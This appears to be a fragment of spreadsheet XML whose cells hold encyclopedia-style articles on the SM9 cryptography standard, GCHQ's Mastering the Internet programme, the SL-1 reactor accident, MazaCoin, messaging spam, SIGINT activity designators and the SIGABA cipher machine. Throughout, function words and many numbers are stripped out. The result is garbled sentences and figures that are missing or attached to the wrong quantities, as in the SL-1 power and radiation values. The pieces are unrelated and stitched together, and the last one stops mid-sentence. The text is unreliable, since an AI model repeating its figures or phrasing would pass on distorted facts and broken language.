    <t>chinese national cryptography standard identity based cryptography issued chinese state cryptographic authority march 2016. represented chinese national cryptography standard (guomi), gm/t 0044-2016 sm9. standard contains following components: (gm/t 0044.1) identity-based asymmetric cryptography algorithm (gm/t 0044.2) identity-based digital signature algorithm allows entity digitally sign message verified another entity. (gm/t 0044.3) identity-based establishment wrapping (gm/t 0044.4) identity based public-key encryption encapsulation algorithm allows entity securely send symmetric another entity. identity based cryptography identity based cryptography type public cryptography uses widely known representation entity's identity (name, email address, phone number etc.) entities public key. this eliminates need separate public bound mechanism (such digitally signed public certificate) identity entity. identity based cryptography (ibc) public often taken concatenation entity's identity validity period public key. identity based cryptography, trusted agent's private keys compute entity's private public (identity validity period). corresponding public keys trusted agent agents known everyone using network. trusted agent used trusted agent compute private keys users network. avoid state, researchers propose using multiple trusted agents need compromised order compute individual public keys. chinese cryptographic standards standard adopted 2016 number chinese national cryptography standards. other publicly available chinese cryptographic standards are: elliptic curve diffie-hellman agreement signature using specified 256-bit elliptic curve. gm/t 0003.1: (published 2010) 256-bit cryptographic hash function. gm/t 0004.1-2012: (published 2010) 128-bit block cipher 128-bit key. gm/t 0002-2012: (published 2012) zuc, stream cipher. gm/t 0001–2016.the standard along standards issued chinese state cryptographic authority. first part standard sm9-1 provides overview standard. identity based signature algorithm identity based signature algorithm traces origins identity based signature algorithm published asiacrypt 2005 paper: "efficient provably-secure identity-based signatures signcryption bilinear maps" barreto, libert, mccullagh, quisquater. standardized ieee 1363.3 iso/iec 14888-3:2015. identity based encapsulation identity based encapsulation algorithm traces origins 2003 paper sakai kasahara titled based cryptosystems pairing elliptic curve." standardized ieee 1363.3, iso/iec 18033-5:2015 ietf 6508. identity based agreement identity based agreement algorithm traces origins 2004 paper mccullagh barreto titled, two-party identity-based authenticated agreement" [1]. international standards organization incorporated identity exchange protocol algorithm iso/iec 11770–3 2015. implementations open source implementation algorithms part gmssl package available github. shenzhen aolian information security technology (also known olym tech) also marketing series products implement algorithms. further information following links provide detailed information algorithms english: cryptographic schemes using identity public transport layer security (tls) datagram transport layer security (dtls) references</t>
  </si>
  <si>
    <t>Mastering the Internet</t>
  </si>
  <si>
    <t>mastering internet (mti) mass surveillance project british communications intelligence agency government communications headquarters (gchq) budgeted billion. according reports register sunday times early 2009, contracts total value £200m already awarded suppliers.responding reports, gchq issued press release countering claims mass surveillance, stating "gchq developing technology enable monitoring internet phone calls britain, target everyone uk."however, 2013 mass surveillance disclosures revealed gchq gathers "raw" information (without filtering communications british citizens) part "mastering internet" programme. background "mastering internet" (mti) project british government part interception modernisation programme (imp). system described 2009 register sunday times replacement scrapped plans single central database. this involves thousands black boxes various internet service providers association gchq base cheltenham, funded single intelligence account budget £1.6 including £200m contract lockheed martin contract systems detica.as 2013, system capable copying signals fibre-optic cables physical points entry great britain. international cooperation canada early 2007, john adams, chief canada's intelligence agency communications security establishment, told parliament canada plans "five eyes" master internet cooperation allies: want master internet. that challenge institution national security agency, nsa, matter manage own. conjunction allies. united states 2013, guardian provided specific details financial contributions made u.s. national security agency (nsa) "mastering internet" part "five eyes" alliance several english-speaking western democracies. according documents leaked edward snowden, paid gchq £17.2 million towards running programme. also communications capabilities development programme global telecoms exploitation mass surveillance united kingdom tempora references</t>
  </si>
  <si>
    <t>SL-1</t>
  </si>
  <si>
    <t>stationary low-power reactor number one, also known sl-1 argonne power reactor (alpr), united states army experimental nuclear reactor western united states national reactor testing station (nrts), later idaho national laboratory, west idaho falls, idaho. experienced meltdown steam explosion night january 1961, killing three young military operators, pinning ceiling facility reactor vessel plug.the direct cause over-withdrawal central control rod, responsible absorbing neutrons reactor's core. event reactor accident u.s. history resulted immediate fatalities. accident released curies (3.0 tbq) iodine-131, considered significant location remote high desert eastern idaho. about 1,100 curies tbq) fission products released atmosphere.the facility housing sl-1, located approximately forty miles west idaho falls, part army nuclear power program. reactor intended provide electrical power heat small, remote military facilities, radar sites near arctic circle, line. design power (thermal), tests performed months prior accident. operating power electrical thermal space heating. during accident, core power level reached nearly four milliseconds, precipitating steam explosion. design operations from 1954 1955, u.s. army evaluated need nuclear reactor plants would operable remote regions arctic. reactors replace diesel generators boilers provided electricity space heating army's radar stations. army reactors branch formed guidelines project contracted argonne national laboratory (anl) design, build, test prototype reactor plant called argonne power reactor (alpr). some important criteria included: components able transported components limited packages measuring feet (2.3 m)and weighing 20,000 pounds (9,100 standard components minimal on-site construction simplicity reliability adaptable arctic permafrost region 3-year fuel operating lifetime core loadingthe prototype constructed national reactor testing station idaho falls, idaho, july 1957 july 1958. went critical august 1958, became operational october formally dedicated december 1958. (thermal) boiling water reactor (bwr) used 93.20% highly enriched uranium fuel. operated natural circulation, using light water coolant (vs. heavy water) moderator. used experience borax experiments design reactor. circulating water system operated pounds square inch (2,100 kpa) flowing fuel plates uranium-aluminum alloy. plant turned army training operating experience december 1958 extensive testing, combustion engineering incorporated (cei) acting lead contractor beginning february 1959. responsible actual operation sl-1 reactor, routine training military personnel developmental research programs. contractor provided site project manager, operations supervisor, test supervisor, technical staff approximately personnel. recent months, project manager spent approximately half time site half time contractor's office connecticut. absence, either operations supervisor test supervisor assigned project manager. understood, indicated testimony board, would provide supervision shifts non-routine work carried out. aec's idaho office army reactors office clearly believed addition night supervisors routine work involved would defeat part purpose operating reactor existing arrangement, i.e., obtain plant operating experience military personnel. trainees army reactor training program included members army, called cadre, primary plant operators. many maritime civilians also trained along force navy personnel. while plant operation generally done cadre two-man crews, development reactor supervised directly staff. decided perform development work reactor recent latter half 1960 reactor operated mwthermal "pl-1 condenser test." reactor core aged boron neutron poison strips corroded flaked off, calculated boron core lost. this resulted addition cadmium sheets (also poison) november 1960, installed several slot positions increase reactor shutdown margin." majority plant equipment located cylindrical steel reactor building 38.5 feet (11.7 diameter overall height feet reactor building, known ara-602, made plate steel, thickness inch mm). access building provided ordinary door enclosed exterior stairwell ara-603, support facilities building. emergency exit door also included, exterior stairwell going ground level. reactor building pressure-type containment shell would used reactors located populated areas. nevertheless, building able contain radioactive particles released eventual explosion. reactor core structure built capacity fuel assemblies, startup neutron source assembly, nine control rods. core use, however, fuel elements controlled five cruciform rods. five active rods shape plus symbol cross section: center (rod number four periphery active core (rods control rods made mils (1.5 thick cadmium, clad mils (2.0 aluminum. they overall span inches effective length inches cm). fuel assemblies composed nine fuel plates each. plates mils (3.0 thick, consisting mils (1.3 uranium-aluminum alloy "meat" covered mils (0.89 x-8001 aluminum cladding. meat 25.8 inches long inches (8.9 wide. water fuel plates mils (7.9 mm). water channels within control shrouds inches mm). initial loading assembly core highly enriched 93.2% uranium-235 contained pounds u-235.the deliberate choice smaller fuel loading element made region near center active would fuel assemblies. four outer control rods even used smaller core tests concluded necessary. operating sl-1 core, rods dummy rods, newly-installed cadmium shims, filled test sensors, shaped like capital letter effort minimize size core gave abnormally large reactivity worth. accident response tuesday, january 1961, sl-1 prepared restart shutdown eleven days holidays. maintenance procedures required manually withdrawn inches reconnect drive mechanism. 9:01 mst, suddenly withdrawn far, causing sl-1 prompt critical instantly. four milliseconds, heat generated resulting enormous power excursion caused fuel inside core melt explosively vaporize. expanding fuel produced extreme pressure wave blasted water upward, striking reactor vessel peak pressure 10,000 pounds square inch (69,000 kpa). slug water propelled feet second m/s) average pressure around pounds square inch (3,400 kpa). this extreme water hammer propelled entire reactor vessel upward feet second (8.2 m/s), shield plugs ejected feet second m/s). with holes reactor vessel, high pressure water steam sprayed entire room radioactive debris damaged core. later investigation concluded 26,000-pound (12,000 thirteen short tons) vessel jumped feet inch (2.77 parts striking ceiling reactor building settling back original location, depositing insulation gravel operating floor. vessel's seal housing hitting overhead crane, pressure vessel enough upward momentum rise feet excursion, steam explosion, vessel movement took four seconds.the spray water steam knocked operators onto floor, killing severely injuring another. shield plug reactor vessel impaled third groin exited shoulder, pinning ceiling. victims army specialists richard leroy mckinley (age john byrnes (age 22), navy seabee construction electrician first class (ce1) richard legg (age 26). later established author todd tucker byrnes (the reactor operator) lifted caused excursion; legg (the shift supervisor) standing reactor vessel impaled pinned ceiling; mckinley (the trainee) stood nearby. only mckinley found alive, unconscious deep shock, rescuers. this consistent analysis sl-1 board investigation results autopsies, suggested byrnes legg died instantly, mckinley showed signs diffuse bleeding within scalp, indicating survived approximately hours succumbing wounds. three succumbed physical trauma. reactor principles events early press reports indicated explosion chemical reaction, shortly ruled out. fast neutron activation occurred various materials room, indicating nuclear power excursion unlike properly operating reactor. thermal-neutron reactor sl-1, neutrons moderated (slowed down) control nuclear fission process increase likelihood fission u-235 fuel. without sufficient moderator, cores sl-1 would unable sustain nuclear chain reaction. when moderator removed core, chain reaction decreases. water, used moderator, maintained high pressure keep liquid. steam formation channels around nuclear fuel suppresses chain reaction. another control effect delayed neutrons chain reaction core. most neutrons (the prompt neutrons) produced nearly instantaneously fission u-235. few—approximately percent u-235-fueled reactor operating steady-state—are produced relatively slow radioactive decay certain fission products. (these fission products trapped inside fuel plates close proximity uranium-235 fuel.) delayed production fraction neutrons enables reactor power changes controlled time scale amenable humans machinery.in case ejected control assembly poison, possible reactor become critical prompt neutrons alone (i.e. prompt critical). when reactor prompt critical, time double power order microseconds. duration necessary temperature follow power level depends design reactor core. typically, coolant temperature lags behind power seconds conventional lwr. sl-1 design, milliseconds steam formation started.sl-1 constructed main central control capable producing large excess reactivity completely removed. extra worth part decision load fuel assemblies nuclear fuel, thus making prototype reactor core active center. normal operation control rods withdrawn enough generate sufficient reactivity sustained nuclear reaction power generation. accident, however, additional reactivity enough take reactor prompt critical within estimated milliseconds. that fast heat fuel permeate aluminum cladding boil enough water fully stop power growth parts core negative moderator temperature void feedback.post-accident analysis concluded final control method (i.e., dissipation prompt critical state sustained nuclear chain reaction) occurred means catastrophic core disassembly: destructive melting, vaporization, consequent conventional explosive expansion parts reactor core greatest amount heat produced quickly. estimated core heating vaporization process happened milliseconds, enough steam formed shut reaction, beating steam shutdown milliseconds. statistic makes clear core blew apart: reactor designed power output operated momentarily peak power density 6,000 times higher safe operating limit. this criticality accident estimated produced 1018 fissions, megajoules kilograms tnt) energy. events power excursion heat sensors reactor alarm nrts security facility 9:01 mst, time accident. false alarms occurred morning afternoon day. response team firemen (ken dearden asst chief, hess lt., archer, carl johnson, egon lamprecht, gerald stuart, vern conlon) arrived nine minutes later, expecting another false alarm. they noticed nothing unusual first, little steam rising building, normal cold (−14 night. firefighters, unable hail anyone inside sl-1 facility, security guard open gate them. they donned scott air-paks, arrived support facilities building investigate. building appeared normal, unoccupied. three mugs warm coffee break room three jackets hanging nearby. they entered reactor control room noticed radiation warning light. their handheld radiation detector jumped sharply maximum range climbing stairs sl-1's reactor operating floor level. this prompted retreat second radiation detector. second radiation detector also maxed röntgens hour (r/hr) scale ascended again. they peered reactor room withdrawing.at 9:17 health physicist arrived; assistant chief moshberger, wearing tanks masks positive pressure mask force potential contaminants, approached reactor building stairs. their detectors read röntgens hour (r/hr) started stairs, withdrew. finding higher-scale chamber detector, pair reached stairs look inside reactor room three missing men. their jordan radector ag-500 meter pegged r/hr they dim, humid, wet, operating floor strewn rocks steel punchings, twisted metal, debris scattered. coming nearby idaho falls, lead sl-1 health physicist, vallario, paul duckworth, sl-1 operations supervisor, arrived sl-1 around 10:30 donned packs went quickly administration building, support building, stairs reactor floor. vallario heard moaning mckinley half-way stairs. finding second operator floor appeared dead, decided return checkpoint help bleeding mckinley.the joined three health physicists donned packs went back reactor floor. masks packs fogging limiting visibility. mckinley moving slightly, body partially covered metal debris, rescuers quickly remove order carry stretcher. vallario moved debris attempt find missing crewman. another checked pulse byrnes announced dead. body byrnes partially covered steel pellets blood.three attempted remove mckinley outside stairs, sending outside meet truck. carrying mckinley across operating floor exit, discovered equipment blocking emergency exit door. this forced rescuers reverse course main stairs.during movement mckinley, scott paks freeze cease work. duckworth evacuated malfunction, vallario removed mask breathed contaminated complete evacuation mckinley. rescue took three minutes.the evacuation mckinley turned quickly major radiological problem. mckinley first shuttled panel truck back ambulance. on-call nurse, helen leisen, tending patient back ambulance, heard least faint breath, perhaps last. vehicle made nearby highway doctor nurse evacuate and, entering ambulance, found pulse. pronounced dead 11:14 contaminated ambulance, body mckinley, driven desert abandoned several hours.four entered reactor building 10:38 found third man. legg discovered last pinned ceiling reactor shield plug easily recognizable.extensive decontamination conducted night. approximately first responders took showers, scrubbed hands potassium permanganate, changed clothes. body ambulance later disrobed returned ambulance, took nearby facility storage autopsy.on night january team volunteers worked pairs recover byrnes' body sl-1 operating floor. taken, also ambulance, facility.after four days planning, third body, contaminated, retrieved. modifications reactor room performed welder inside lead shielded attached crane. january relays time, team men, allowed seconds exposure each, used sharp hooks long poles pull legg's body free shield plug, dropping onto 5-by-20-foot (1.5 stretcher attached crane outside building.radioactive copper 64cu cigarette lighter screw mckinley brass watch band buckle byrnes proved reactor indeed gone prompt critical. this confirmed several readings, including gold 198au legg's wedding ring. nuclear accident dosimeters inside reactor plant particles uranium victim's clothes also provided evidence excursion. prior discovery neutron-activated elements men's belongings, scientists doubted nuclear excursion occurred, believing reactor inherently safe. strontium-91, major fission product, also found uranium particles. these findings ruled early speculation chemical explosion caused accident.some sources eyewitness accounts confuse names positions victim. idaho falls: untold story america's first nuclear accident, author indicates rescue teams identified byrnes found still alive, believing legg's body found next reactor shield recovered night accident, mckinley impaled control ceiling directly reactor. misidentification, caused severe blast injuries victims, rectified autopsies conducted clarence lushbaugh, caused confusion time.the seven rescuers carried mckinley received carnegie hero awards carnegie hero fund were: paul duckworth, sl-1 operations supervisor; sidney cohen, sl-1 test supervisor; william rausch, sl-1 assistant operations supervisor; vallario, sl-1 health physicist; william gammill, on-duty site survey chief; lovell callister, health physicist, delos richards, health physics technician. cause required maintenance procedures called manually withdrawn approximately four inches order attach automated control mechanism disconnected. post-accident calculations, well examination scratches estimate actually withdrawn approximately twenty inches cm), causing reactor prompt critical triggering steam explosion. common theories proposed withdrawal sabotage suicide operators, murder-suicide involving affair wife operators, inadvertent withdrawal main control rod, intentional attempt "exercise" make travel smoothly within sheath). maintenance logs address technicians attempting thus actual cause accident never known. however, seems unlikely suicide.post-accident experiments conducted identically weighted mock control determine whether possible feasible withdrawn inches. experiments included simulation possibility 48-pound central stuck freed himself, reproducing scenario investigators considered best explanation: byrnes broke control loose withdrew accidentally, killing three men. when testing theory rapidly withdrawn manually, three took part timed trials efforts compared energy nuclear excursion occurred. spare sl-1 control actuator assembly used mock-up speed manual withdrawal measured several subjects. equipment sl-1 except control rod, simulated weight give total movable load lb., weight sl-1 movable assembly water. [...] test conducted instructing subject lift rapidly possible, electric timer, measured elapsed time beginning motion predetermined distance withdrawal. distances inches measured. [...] reasoning indicates required rate withdrawal produce period short milliseconds well within limits human capability. sl-1, control rods would stuck control channel sporadically. numerous procedures conducted evaluate control rods ensure operating properly. there drop tests scram tests rod, addition periodic exercising withdrawals normal operation. from february 1959 november 1960, cases stuck control scram drop tests 2.5% failure rate. from november december 1960, dramatic increase stuck rods, time period 13.0% failure rate. besides test failures, additional rod-sticking incidents february 1959 december 1960; four occurred last month operation routine withdrawal. best operational performance record even though operated frequently rods. sticking attributed misalignment, corrosion product build-up, bearing wear, clutch wear, drive mechanism seal wear. many failure modes caused stuck tests (like bearing clutch wear) would apply movement performed control drive mechanism. since centrally located, alignment better nos. prone sticking. after accident, logbooks former plant operators consulted determine rods stuck reassembly operation byrnes performing. person performed times, another times; neither ever felt control stick manually raised procedure. furthermore, ever reported stuck manual reconnection. during congressional hearings june 1961, sl-1 project manager, allred, admitted lack supervision sl-1 plant operation "around-the-clock basis" atomic energy commission (aec) rejected idea "for budget reasons." allred also grilled matter increased sticking november 1960, final shutdown december increase, allred stated, completely aware significant increase" and, aware sharp increase occurred." when asked person responsible informing sticking problem, allred stated paul duckworth, sl-1 operations supervisor, reported not. when pressed, allred stated known increased control sticking, "would shut plant detailed examination." mechanical material evidence, combined nuclear chemical evidence, forced believe central control withdrawn rapidly. scientists questioned [former operators sl-1]: "did know reactor would critical central control removed?" answer: course! often talked would radar station russians came. we'd yank out." consequences accident caused sl-1's design abandoned future reactors designed single control removal would ability produce large excess reactivity. today known "one stuck rod" criterion requires complete shutdown capability even reactive stuck fully withdrawn position. documentation procedures required operating nuclear reactors expanded substantially, becoming formal procedures previously taken pages expanded hundreds. radiation meters changed allow higher ranges emergency response activities. although portions center sl-1's core vaporized briefly, little corium recovered. fuel plates showed signs catastrophic destruction leaving voids, appreciable amount glazed molten material recovered observed." additionally, "there evidence molten material flowed plates." believed rapid cooling core responsible small amount molten material. there insufficient heat generated corium reach penetrate bottom reactor vessel. despite sl-1 reactor building containing radioactivity, iodine-131 levels plant buildings reached fifty times background levels downwind several days monitoring. radiation surveys support facilities building, example, indicated high contamination halls, light contamination offices. radiation exposure limits prior accident röntgens save life save valuable property. during response accident, people received doses röntgens full-body exposure. removal radioactive waste disposal three bodies eventually exposed people harmful levels radiation. march 1962, awarded certificates heroism participants response. after pause evaluation procedures, army continued reactors, operating mobile low-power reactor (ml-1), started full power operation february 1963, becoming smallest nuclear power plant record this design eventually abandoned corrosion problems. while tests shown nuclear power likely lower total costs, financial pressures vietnam caused army favor lower initial costs stopped development reactor program 1965, although existing reactors continued operating (mh-1a 1977). cleanup general electric tasked removal reactor vessel dismantling cleanup contaminated buildings sl-1 project site. site cleaned 1961 1962, removing bulk contaminated debris burying massive cleanup operation included transport reactor vessel nearby "hot shop" extensive analysis. other items less importance either disposed transported decontamination sites various kinds cleaning. about people took part sl-1 site cleanup, including volunteers u.s. army atomic energy commission.the recovery operation included clearing operating room floor radioactive debris. extremely high radiation areas surrounding reactor vessel room directly contributed difficulty recovering reactor vessel. remotely operated equipment, cranes, boom trucks, safety precautions developed tested recovery team. radiation surveys photographic analysis used determine items needed removed building first. powerful vacuum cleaners, operated manually teams men, collected vast quantities debris. manual overhead crane operating floor used move numerous heavy objects weighing 19,600 pounds (8,900 dumped onto ground outside. spots r/hr discovered removed work area. with operating room floor relatively clean radiation fields manageable, manual overhead crane employed trial lift reactor vessel. crane fitted dial-type load indicator vessel lifted inches. successful test found estimated 23,000 pounds (10,000 vessel plus unknown amount debris weighed 26,000 pounds (12,000 kg). after removing large amount building structure reactor vessel, 60-ton manitowoc model 3900 crane lifted vessel building awaiting transport cask attached tractor-trailer combination low-boy 60-ton capacity trailer. after raising removing power lines, phone lines, wires proposed roadway, tractor-trailer, accompanied numerous observers supervisors, proceeded km/h) shop (originally associated aircraft nuclear propulsion program), located remote area nrts known test area north, miles away.a burial ground constructed approximately 1,600 feet (500 northeast original site reactor. opened 1961. burial waste helped minimize radiation exposure public site workers would resulted transport contaminated debris sl-1 radioactive-waste management complex miles public highway. original cleanup site took months. entire reactor building, contaminated materials nearby buildings, soil gravel contaminated cleanup operations disposed burial ground. majority buried materials consist soils gravel. recovered portions reactor core, including fuel parts reactor important accident investigation, taken shop study. after accident investigation complete, reactor fuel sent idaho chemical processing plant reprocessing. reactor core minus fuel, along components sent shop study, eventually disposed radioactive waste management complex.the remains sl-1 buried near original site 43°31′17.8″n 112°49′04.8″w. burial site consists three excavations, total volume 99,000 cubic feet (2800 contaminated material deposited. excavations close basalt equipment used would allow ranges eight fourteen feet (2.4 depth. least feet (0.6 clean backfill placed excavation. shallow mounds soil excavations added completion cleanup activities september 1962. site burial mound collectively known united states environmental protection agency superfund operable unit 5-05.numerous radiation surveys cleanup surface burial ground surrounding area performed years since sl-1 accident. aerial surveys performed eg&amp;g vegas 1974, 1982, 1990, 1993. radiological environmental sciences laboratory conducted gamma radiation surveys every three four years 1973 1987 every year 1987 1994. particle-picking site performed 1985 1993. results surveys indicated cesium-137 progeny (decay products) primary surface-soil contaminants. during survey surface soil june 1994, "hot spots," areas higher radioactivity, found within burial ground activities ranging milliroentgen (mr)/hour. november 1994, highest radiation reading measured feet (0.75 surface sl-1 burial ground mr/hour; local background radiation mr/hour. 1995 assessment recommended placed burial mounds. primary remedy sl-1 containment capping engineered barrier constructed primarily native materials. this remedial action completed 2000 first reviewed 2003. movies books u.s. government produced film accident internal 1960s. video subsequently released viewed internet archive youtube. sl-1 title 1983 movie, written directed diane larry roberts, nuclear reactor explosion. interviews scientists, archival film, contemporary footage, well slow-motion sequences, used film. events accident also subject book: idaho falls: untold story america's first nuclear accident (2003) chapters proving principle history idaho national engineering environmental laboratory, 1949–1999 (2000).in 1975, anti-nuclear book almost lost detroit, john fuller published, referring point idaho falls accident. prompt critical title 2012 short film, viewable youtube, written directed james lawrence sicard, dramatizing events surrounding sl-1 accident. documentary accident shown history channel. another author, todd tucker, studied accident published book detailing historical aspects nuclear reactor programs u.s. military branches. tucker used freedom information obtain reports, including autopsies victims, writing detail person died parts bodies severed, analyzed, buried radioactive waste. autopsies performed pathologist known work following cecil kelley criticality accident. tucker explains reasoning behind autopsies severing victims' body parts, gave 1,500 r/hour contact. because sl-1 accident killed three military operators site, tucker calls "the deadliest nuclear reactor incident u.s. history." also borax experiments, 1953–54, proved transformation water steam would safely limit boiling water reactor power excursion, similar incident. international nuclear event scale list civilian nuclear accidents list civilian radiation accidents list military nuclear accidents list nuclear reactors nuclear power debate nuclear safety security radiation radioactive contamination references external links "sl-1 reactor accident january 1961, interim report", 1961. from page. 15.5 pdf. "ido report nuclear incident sl-1 reactor january 1961, national reactor testing station, january 1962. 16.5 pdf. from page. this report accurate times events. short film sl-1 accident: briefing film report available free download internet archive. short film sl-1 accident: phases available free download internet archive. department energy document: nuclear reactor testing</t>
  </si>
  <si>
    <t>MazaCoin</t>
  </si>
  <si>
    <t>mazacoin (maza, mzc) cryptocurrency launched 2014. history some native americans adopted mazacoin battle government.in october 2017, mashable article oglala lakota included video harris's efforts mazacoin accepted. references further reading indigenous cryptocurrency: affective capitalism rhetorics sovereignty first monday october 2016, volume number cindy tekobbe john carter mcknight decolonization digital age: cryptocurrencies indigenous self-determination canada canadian journal society april 2017, volume issue 19-35) christopher alcantara caroline dick external links official website</t>
  </si>
  <si>
    <t>Messaging spam</t>
  </si>
  <si>
    <t>messaging spam, sometimes called spim, type spam targeting users instant messaging (im) services, sms, private messages within websites. instant messaging applications instant messaging systems, telegram, whatsapp, twitter direct messaging, kik, skype snapchat targets spammers. many services publicly linked social media platforms, include information user age, sex, location interests. advertisers scammers gather information, sign service, send unsolicited messages could contain scam links, pornographic material, malware ransomware. with services users report block spam accounts, privacy settings contacts contact them. countermeasures many users choose receive people already contact list. corporate settings, spam blocked spam blockers like actiance, scansafe, symantec. providers like "report user" button, sends chatlog administrators take action. pornographic spambots spam-bots often sign popular messaging services like skype spread pornographic images. often user responds receive inviting private livestream enter credit card details "age verification". these bots target random usernames; often results minors receiving unsolicited pornographic images. messenger service spam windows nt-based systems 2002, number spammers began abusing windows messenger service, function windows designed allow administrators send alerts users' workstations (not confused windows messenger windows live messenger, free instant messaging application) microsoft's windows nt-based operating systems. messenger service spam appears normal dialog boxes containing spammer's message. these messages easily blocked firewalls configured block packets netbios ports 135-139 well unsolicited packets ports 1024. additionally, windows service pack disables messenger service default. messenger service spammers frequently send messages vulnerable windows machines url. message promises user eradicate spam messages sent messenger service. leads website where, fee, users told disable messenger service. though messenger easily disabled free user, works creates perceived need offers immediate solution. spam detection opinion-based recommender system opinion based recommender system, important concern evaluate user-generated reviews items. purpose evaluation identify malicious spam reviews. poorly written reviews considered helpless recommender system. however, even review well generated, still harmful recommender system biased prejudice form actual advertisement slander towards target item. current approach spam detection methods includes analyzing spam text identifying spam reviewers reviews activities. first kind, machine learning application review text developed. second kind, researchers network motif analysis technique identify spam reviewers recurring reviewing activity. references</t>
  </si>
  <si>
    <t>SIGINT Activity Designator</t>
  </si>
  <si>
    <t>sigint activity designator sigad) identifies signals intelligence (sigint) line collection activity associated signals collection station, base ship. example, sigad menwith hill usd1000. sigads used signals intelligence agencies united states, united kingdom, canada, australia zealand (the five eyes). there several thousand sigads including substation sigads denoted trailing alpha character. several dozen significant. leaked boundless informant reporting screenshot showed summarized active sigads 30-day period march 2013. general format sigad consists five eight case insensitive alphanumeric characters. takes general form alphanumeric designator normally composed two- three-letter prefix followed three numbers. often dash used separate alphabetic numeric characters primary part designator, less frequently space used separator alphabetic numeric characters concatenated together. additional alphabetic character added denote sub-designator subset primary unit, detachment. lastly, numeric character added aforementioned alphabetic provide sub-sub-designator. examples represents alphabetic character represents numeric character part primary designator. likewise, represents alphabetic character represents numeric character part sub-designator. here valid generalized examples sigads: first characters show country operates particular sigint facility, united states, united kingdom, canada, australia zealand. third letter shows sort staff runs station. sigads beginning without third letter used intercept facilities nsa. prism sigad prominent sigad april 2013 us-984xn, unclassified codename prism. "the number source intelligence used analytic reports" according national security agency sources document leaked edward snowden. president's daily brief, all-source intelligence product, cited sigad us-984xn source 1,477 items 2012. u.s. government operates prism electronic surveillance collection program nsa's special source operations, alliance trusted telecommunications providers. sigads ships declassifed sigad liberty (agtr-5) usn-855. liberty incident occurred june 1967, six-day war, israeli force fighter aircraft israeli navy motor torpedo boats attacked liberty international waters. pueblo (ager-2) technical research ship, boarded captured north korean forces january 1968, known pueblo incident. declassified sigad direct support unit (dsu) naval security group (nsg) pueblo patrol involved incident usn-467y. pueblo, officially remains commissioned vessel united states navy, ship u.s. navy currently held captive. vietnam sigads following vietnam war-era declassified sigads inside south vietnam period 1969 1975: some locations multiple sigads different types collection activities and/or collection different times period. sigads beginning operated united states force's united states force security service (usafss). sigads beginning operated united states army's army security agency (asa). lastly, sigads beginning operated united states navy's naval security group (navsecgru). three units merged units inactivated.the list consists higher-echelon sigads. include numerous miscellaneous temporary detachments, direction finding stations belonging major units sites unless detachment site stationed south vietnam. many "dets" short-lived, often formed support ongoing macv operations forward deployments combat operational maneuver units. these detachments usually designated letter suffix attached higher-echelon sigad "usm-633j," detachment 372d radio research company, usm-633, supporting united states army's 25th infantry division. supporting southeast asia sigads following declassified sigads highly relevant vietnam campaign, located areas outside south vietnam southeast asia. again, detachments listed separately. case maddox, naval direct support units (dsus) used sigad usn-467 generic designator missions. each specific patrol received letter suffix duration. subsequent mission would receive next letter alphabetic sequence. thus, sigad usn-467n specifically designates maddox patrol involved gulf tonkin incident. joint base sigads november 2005, congress performed fifth round base realignment closure. this 2005 also created twelve joint bases merging adjacent installations belonging different services effort reduce costs improve efficiencies.joint bases primarily sigint mission sigads begin usj. joint base would primary sigad general form usj-nnn, numeric characters. actual example given, since units currently active. also boundless informant national security agency united states intelligence community references external links list sigint activity designators things didn’t know about national security agency surveillance program february 2013)</t>
  </si>
  <si>
    <t>SIGABA</t>
  </si>
  <si>
    <t>history cryptography, mark cipher machine used united states message encryption world 1950s. machine also known sigaba converter m-134 army, csp-888/889 navy, modified navy version termed csp-2900. like many machines used electromechanical system rotors encipher messages, number security improvements previous designs. successful cryptanalysis machine service lifetime publicly known. history clear cryptographers well world single-stepping mechanical motion rotor machines (e.g. hebern machine) could exploited attackers. case famous enigma machine, attacks supposed upset moving rotors random locations start message. this, however, proved secure enough, german enigma messages frequently broken cryptanalysis world william friedman, director army's signals intelligence service, devised system correct attack truly randomizing motion rotors. modification consisted paper tape reader teletype machine attached small device metal "feelers" positioned pass electricity holes. when letter pressed keyboard signal would sent rotors enigma, producing encrypted version. addition, current would also flow paper tape attachment, holes tape current location would cause corresponding rotor turn, advance paper tape position. comparison, enigma rotated rotors position press, much less random movement. resulting design went limited production m-134 converter, message settings included position tape settings plugboard indicated line holes tape controlled rotors. however, problems using fragile paper tapes field conditions. friedman's associate, frank rowlett, came different advance rotors, using another rotors. rowlett's design, rotor must constructed four output signals generated, advancing rotors (rotors normally output every input). there little money encryption development war, friedman rowlett built series "add devices called siggoo m-229) used existing m-134s place paper tape reader. these external boxes containing three rotor setup five inputs live, someone pressed five keys time enigma, outputs "gathered five groups well letters would wired together instance. that five signals input side would randomized rotors, come side power five lines. movement rotors could controlled code, paper tape eliminated. they referred combination machines m-134-c. 1935 showed work joseph wenger, cryptographer op-20-g section u.s. navy. found little interest navy early 1937, showed commander laurance safford, friedman's counterpart office naval intelligence. immediately potential machine, commander seiler added number features make machine easier build, resulting electric code machine mark mark ii), navy produced csp-889 888). oddly, army unaware either changes mass production system, "let secret early 1940. 1941 army navy joined joint cryptographic system, based machine. army started using sigaba. just 10,000 machines built.: june 1942, army navy agreed allow sigaba machines placed foreign territory except armed american personnel able protect machine. sigaba would made available another allied country personnel country denied direct access machine operation american liaison officer would operate description sigaba similar enigma basic theory, used series rotors encipher every character plaintext different character ciphertext. unlike enigma's three rotors however, sigaba included fifteen, reflecting rotor. sigaba three banks five rotors each; action banks controlled stepping third. main bank five rotors termed cipher rotors (army) alphabet maze (navy) rotor contacts. this assembly acted similarly rotor machines, enigma; plaintext letter entered, signal would enter side bank exit other, denoting ciphertext letter. unlike enigma, reflector. second bank five rotors termed control rotors stepping maze. these also 26-contact rotors. control rotors received four signals step. after passing control rotors, outputs divided groups various sizes, ranging wires. each group corresponded input wire next bank rotors. third bank rotors called index rotors. these rotors smaller, contacts, step encryption. after travelling though index rotors, four five output lines would power. these turned cypher rotors. sigaba advanced main rotors complex, pseudorandom fashion. this meant attacks could break rotor machines simple stepping (for example, enigma) made much complex. even plaintext hand, many potential inputs encryption difficult work settings. downside, sigaba also large, heavy, expensive, difficult operate, mechanically complex, fragile. nowhere near practical device enigma, smaller lighter radios used. found widespread radio rooms navy ships, result practical problems sigaba simply used field. theatres systems used instead, especially tactical communications. famous navajo code talkers tactical field communications pacific theater. theatres, less secure, smaller, lighter, sturdier machines used, m-209. sigaba, impressive was, overkill tactical communications. this said, speculative evidence emerged recently m-209 code broken german cryptanalysts world operation because sigaba reflector, pole switch needed change signal paths alphabet maze encryption decryption modes. long “controller” switch mounted vertically, knob housing. image. five positions, besides encrypt decrypt (d), plain text position printed whatever typed output tape, reset position used rotors zeroize machine. position turned machine off. setting used print 